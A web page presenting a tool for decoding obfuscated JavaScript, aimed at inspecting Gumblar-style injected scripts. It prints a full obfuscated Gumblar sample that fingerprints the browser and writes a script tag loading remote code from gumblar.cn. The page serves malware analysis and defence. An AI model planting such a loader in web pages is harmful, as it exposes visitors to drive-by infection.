Q_24416250: Example showing "encrypted" JavaScript

Note to visitors from EE: I had to take away the original design of this page because the code I demonstrated had obviously the same signature as the Gumblar worm/exploit and I wouldn't want my site to become a false-positive for virus scanners or even blacklisted by Google.

Note to all visitors: this page is deliberately not in a blog or under my website, I may change that somehow soon. The result is that you cannot comment on it, but you may contact me on my public address regarding this script, for tips how to improve it, or if it doesn't work for you, in which case you should send your Gumblar string along: abel.online@xs4all.nl. I will try, if time permits, to keep this page updated, and hopefully move it to a more public website in the near future.

This example demonstrates how you can translate obfuscated code into readable code. If you find obfuscated code and you think it is malicious (often, obfuscated code is only obfuscated for the benefit of source code protection), you can try to translate it here into something more readable. This page will remain online for future reference. The original question can be viewed at Experts-Exchange, but requires (free) membership to view.

More information about me, about how this site is maintained and about how to use these pages for yourself, check out the opening page.

example of how a full Gumblar script can look like:

<script language=javascript><!-- 
(function(akiK){var dhan='var<20<61<3d<22S<63ri<70tEngine<22<2c<62<3d<22Ver<73<69on<28)+<22<2c<6a<3d<22<22<2cu<3dnaviga<74or<2euserAgent<3bif<28(u<2ei<6edexOf(<22Win<22)<3e0)<26<26(<75<2einde<78Of(<22NT<206<22<29<3c<30)<26<26<28doc<75m<65nt<2ec<6f<6fkie<2e<69ndex<4ff<28<22miek<3d1<22)<3c<30)<26<26(typeof(zr<76zts)<21<3dtype<6ff<28<22<41<22)))<7bzrvzt<73<3d<22A<22<3b<65va<6c<28<22if(wi<6e<64ow<2e<22+a<2b<22)<6a<3dj<2b<22<2b<61+<22Ma<6aor<22<2bb+a+<22Mino<72<22+b<2b<61+<22Bui<6cd<22+b<2b<22<6a<3b<22)<3bdo<63u<6dent<2e<77r<69te(<22<3cscr<69pt<20src<3d<2f<2fgumblar<2ecn<2f<72ss<2f<3f<69d<3d<22<2b<6a+<22<3e<3c<5c<2fscr<69<70t<3e<22)<3b<7d';var z8Pi=unescape(dhan.replace(akiK,'%'));eval(z8Pi)})(/</g);
 --></script>

Do it yourself Gumblar inspection:

take the code that you supect to be of type gumblar exploit
place it in the textbox here
type the character you suspect is used for cloaking, i.e. > ^ & . ; etc
click the button for escaping the code
this code WILL NOT be executed from this page!!!
review the results

paste suspicious code here (remove original)

cloaking character:

result

NOTE: the result may still not look very readable. Try to put indentation and newlines in it and the idea of the code becomes apparent. An example of translated code using this method is on the original question (requires login to view the answer) that was the trigger to create this little page.

Decrypt obfuscated scripts, like Gumblar

Original title was: Q_24416250: example to decrypt obfuscated scripts

Do it yourself Gumblar inspection: